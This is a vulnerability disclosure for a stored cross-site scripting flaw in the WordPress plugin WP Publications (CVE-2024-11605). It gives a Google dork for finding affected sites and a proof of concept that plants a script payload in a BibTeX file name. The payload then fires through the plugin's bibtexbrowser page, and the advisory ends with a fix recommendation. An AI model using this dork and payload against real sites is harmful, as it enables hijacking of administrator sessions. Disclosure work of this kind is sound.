# Exploit Title: WordPress Plugin WP Publications <= 1.2 - Admin+ Stored XSS # Google Dork: inurl:/wp-content/plugins/wp-publications/ # Date: 2025-07-15 # Exploit Author: Zeynalxan Quliyev, Ravan Poladli # Vendor Homepage: https://wordpress.org/plugins/wp-publications/ # Software Link: https://downloads.wordpress.org/plugin/wp-publications.1.2.zip # Version: <= 1.2 # Tested on: WordPress 6.5.3 / Linux (Apache) # CVE: CVE-2024-11605 ## Vulnerability Details The WP Publications plugin for WordPress (versions <= 1.2) is vulnerable to a **Stored Cross-Site Scripting (XSS)** attack. The vulnerability exists because the plugin fails to escape filenames before outputting them in the HTML, allowing high-privileged users (such as admins) to inject arbitrary JavaScript code. This vulnerability is exploitable even in WordPress configurations where the `unfiltered_html` capability is disabled (e.g., multisite setups). --- ## Proof of Concept (PoC) 1. SSH into the server and navigate to the plugin directory: ```bash cd /var/www/html/wp-content/plugins/wp-publications/ ``` 2. Run the following command to create a malicious BibTeX file: ```bash touch "<img src=x onerror=alert('XSS')>.bib" ``` 3. Access the plugin's BibTeX browser via the following URL: ``` https://example.com/wp-content/plugins/wp-publications/bibtexbrowser.php?frameset&bib= ``` 4. The injected JavaScript will be executed, triggering the XSS payload: ```javascript alert('XSS'); ``` --- ## Impact * Stored XSS (JavaScript) is executed in the context of the admin panel. * Bypasses `unfiltered_html` protection in multisite environments. * Can be used for privilege escalation, cookie theft, or injecting malicious content. --- ## Recommendation Update to a version of the plugin that properly escapes file names before rendering them in the output. If no update is available, disable the plugin or sanitize file inputs manually. ---